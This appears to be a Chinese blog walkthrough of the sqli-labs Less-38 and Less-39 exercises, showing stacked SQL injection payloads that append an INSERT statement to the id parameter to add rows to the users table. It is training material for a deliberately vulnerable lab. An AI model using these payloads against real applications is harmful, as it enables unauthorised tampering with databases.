目录
关于堆叠注入的简介前面已经介绍过了,可以参考:第三部分/page-3 Stacked injection 堆叠注入_m0_54899775的博客-CSDN博客
Less-38
源码:
在执行 select 时的 sql 语句为:SELECT * FROM users WHERE id='$id' LIMIT 0,1可以直接构造如下的 payload:
?id=1';insert into users(id,username,password) values ('38','less38','hello')--+
查看数据库:
发现已经添加成功。
Less-39
源码:
和 less-38 的区别在于 sql 语句的不一样:SELECT * FROM users WHERE id=$id LIMIT 0,1
也就是数字型注入,我们可以构造以下的 payload:
?id=1;insert into users(id,username,password) values ('39','less39','111')--+